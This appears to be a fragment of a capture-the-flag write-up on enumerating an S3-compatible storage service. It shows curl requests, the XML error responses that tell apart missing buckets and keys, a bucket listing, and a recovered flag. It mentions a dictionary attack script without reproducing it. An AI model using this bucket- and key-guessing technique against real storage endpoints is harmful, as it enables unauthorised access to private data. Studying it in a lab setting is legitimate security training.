curl http://< ip> :9000 -s | xmllint --format - Response when S3 endpoint possibly running <?xml version =" 1.0" encoding =" UTF-8" Error >
<Code >AccessDenied</Code >
<Message >Access Denied</Message >
<Resource />
<RequestId >5200567f7842ae6a2f26</RequestId >
</Error > curl http://< ip> /randombucket -s | xmllint --format - Response with wrong bucket name <?xml version =" 1.0" encoding =" UTF-8" Error >
<Code >NoSuchBucket</Code >
<Message >The specified bucket does not exist.</Message >
<Resource />
<RequestId >72e9a249b34fba293eee</RequestId >
</Error > Response with correct bucket name <?xml version =" 1.0" encoding =" UTF-8" ListBucketResult xmlns =" http://s3.amazonaws.com/doc/2006-03-01/" Name >secret</Name >
<Prefix />
<MaxKeys >1000</MaxKeys >
<IsTruncated >false</IsTruncated >
<Marker />
<Contents >
<Key >FLAG</Key >
<LastModified >2019-09-16T19:21:39.056Z</LastModified >
<ETag >"56750082ea3b6c9b5827eda341583bf6"</ETag >
<Size >33</Size >
<Owner >
<ID > 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be</ID >
<DisplayName >Alice</DisplayName >
</Owner >
<StorageClass >STANDARD</StorageClass >
</Contents >
</ListBucketResult > Dictionary attack script
curl http://< ip> /knownbucket/randomkey -s | xmllint --format - <?xml version =" 1.0" encoding =" UTF-8" Error >
<Code >NoSuchKey</Code >
<Message >The specified key does not exist.</Message >
<Key >randomkey</Key >
<BucketName >public</BucketName >
<Resource >/public/randomkey</Resource >
<RequestId >166DF541F130B48E</RequestId >
<HostId >e695e068-bb4f-4118-ad09-02b2e51a6b66</HostId >
</Error > Response with correct key Flag: 155a5314e36f03ec70eadb3c7dd91049
Dictionary attack script